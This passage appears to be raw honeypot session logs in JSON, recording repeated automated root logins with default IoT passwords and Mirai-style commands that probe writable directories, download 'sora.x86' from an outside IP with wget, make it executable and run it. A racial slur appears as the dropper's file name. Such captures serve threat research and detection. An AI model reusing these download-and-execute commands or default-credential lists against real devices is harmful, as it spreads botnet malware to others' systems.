- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.174Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:13:02.886Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "admin",
- "username": "root"
- }
- ],
- "3a622d1d2b9b": [
- {
- "@timestamp": "2018-09-15T04:13:16.132Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:16.038Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.665Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.570Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.480Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.380Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.279Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.270Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.269Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.261Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.259Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.251Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.249Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.241Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.239Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.238Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.230Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.229Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.221Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.219Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.212Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.210Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.208Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.206Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.118Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:13:15.029Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:13:14.120Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "admin",
- "username": "root"
- }
- ],
- "4a2173a89839": [
- {
- "@timestamp": "2018-09-15T04:13:08.756Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:08.662Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:13:08.277Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:08.156Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:08.007Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.896Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.682Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.673Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.671Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.664Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.662Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.661Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.653Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.651Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.643Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.642Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.634Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.632Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.631Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.623Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.622Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.620Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.613Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.611Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.603Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:13:05.151Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:13:04.338Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "root",
- "username": "root"
- }
- ],
- "754620698f23": [
- {
- "@timestamp": "2018-09-15T04:13:08.766Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:08.659Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:13:08.272Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:08.161Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:08.009Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.909Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.767Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.764Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.757Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.756Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.748Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.747Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.745Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.737Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.736Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.729Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.727Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.725Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.721Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.714Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.711Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.710Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.702Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.701Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:13:07.693Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:13:05.981Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:13:05.152Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "admin",
- "username": "root"
- }
- ],
- "8c6b47af4e07": [
- {
- "@timestamp": "2018-09-15T04:13:36.032Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.945Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.594Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.505Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.374Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.290Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.200Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.196Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.194Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.192Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.190Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.188Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.185Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.183Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.180Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.178Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.175Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.171Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.168Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.165Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.163Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.160Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.157Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.155Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:13:35.073Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:13:34.993Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:13:34.500Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "vizxv",
- "username": "root"
- }
- ],
- "9aebadf5f9db": [
- {
- "@timestamp": "2018-09-15T04:12:44.376Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:44.330Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:12:44.153Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:44.104Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:44.014Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.973Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.924Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.920Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.918Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.916Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.914Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.912Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.910Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.908Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.906Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.904Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.902Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.900Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.898Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.896Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.894Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.892Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.889Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.886Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.844Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:12:43.801Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:12:43.514Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "vizxv",
- "username": "root"
- }
- ],
- "9ec72e2fd074": [
- {
- "@timestamp": "2018-09-15T04:19:28.459Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:19:28.367Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:19:28.002Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.907Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.772Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.680Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.580Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.571Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.570Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.561Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.559Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.552Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.550Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.542Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.540Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.531Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.529Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.522Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.518Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.517Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.509Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.507Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.499Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.496Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.405Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:19:27.305Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:19:25.746Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "t0talc0ntr0l4!",
- "username": "root"
- }
- ],
- "bfa63a6b165d": [
- {
- "@timestamp": "2018-09-15T04:21:08.882Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:08.789Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:21:08.401Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:08.300Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:08.205Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:08.104Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.997Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.987Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.978Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.976Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.969Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.959Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.957Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.949Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.948Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.940Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.929Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.927Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.919Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:21:07.917Z",
- "eventid": "command.input",
